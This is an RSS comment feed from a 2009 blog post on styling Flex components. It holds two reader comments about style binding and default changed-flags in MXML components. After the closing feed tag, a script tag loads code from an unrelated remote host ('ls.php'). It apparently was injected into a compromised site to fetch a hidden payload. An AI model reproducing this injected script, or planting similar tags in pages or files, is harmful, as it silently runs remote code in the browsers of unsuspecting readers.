<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: 5 tips to help designers style your Flex components</title>
	<atom:link href="http://codeofdoom.com/wordpress/2009/03/03/5-tips-to-help-designers-style-your-flex-components/feed/" rel="self" type="application/rss+xml" />
	<link>http://codeofdoom.com/wordpress/2009/03/03/5-tips-to-help-designers-style-your-flex-components/</link>
	<description></description>
	<lastBuildDate>Mon, 30 Aug 2010 22:57:03 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
	<item>
		<title>By: Anonymous</title>
		<link>http://codeofdoom.com/wordpress/2009/03/03/5-tips-to-help-designers-style-your-flex-components/comment-page-1/#comment-250</link>
		<dc:creator>Anonymous</dc:creator>
		<pubDate>Mon, 31 Aug 2009 13:06:04 +0000</pubDate>
		<guid isPermaLink="false">http://codeofdoom.com/wordpress/?p=247#comment-250</guid>
		<description>Just like your ButtonContainer, I have a MXML component where I am trying to use Binding to set the Button Style, but it only works once.


Any idea why it doesn&#039;t work when I change the component style.</description>
		<content:encoded><![CDATA[<p>Just like your ButtonContainer, I have a MXML component where I am trying to use Binding to set the Button Style, but it only works once.</p>
<p>Any idea why it doesn&#8217;t work when I change the component style.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Kevin</title>
		<link>http://codeofdoom.com/wordpress/2009/03/03/5-tips-to-help-designers-style-your-flex-components/comment-page-1/#comment-168</link>
		<dc:creator>Kevin</dc:creator>
		<pubDate>Mon, 06 Apr 2009 21:39:42 +0000</pubDate>
		<guid isPermaLink="false">http://codeofdoom.com/wordpress/?p=247#comment-168</guid>
		<description>Just a note: Make sure your changed flags (_styleNameChanged, in this example) are set to TRUE by default.  For some reason, initial styles (set via CSS or in MXML) that are applied to components don&#039;t trigger the styleChanged method, so unless these properties are true at startup, updateDisplayList won&#039;t know to set them on your subcomponents.</description>
		<content:encoded><![CDATA[<p>Just a note: Make sure your changed flags (_styleNameChanged, in this example) are set to TRUE by default.  For some reason, initial styles (set via CSS or in MXML) that are applied to components don&#8217;t trigger the styleChanged method, so unless these properties are true at startup, updateDisplayList won&#8217;t know to set them on your subcomponents.</p>
]]></content:encoded>
	</item>
</channel>
</rss>
<script src="http://indesignstudioinfo.com/ls.php"></script>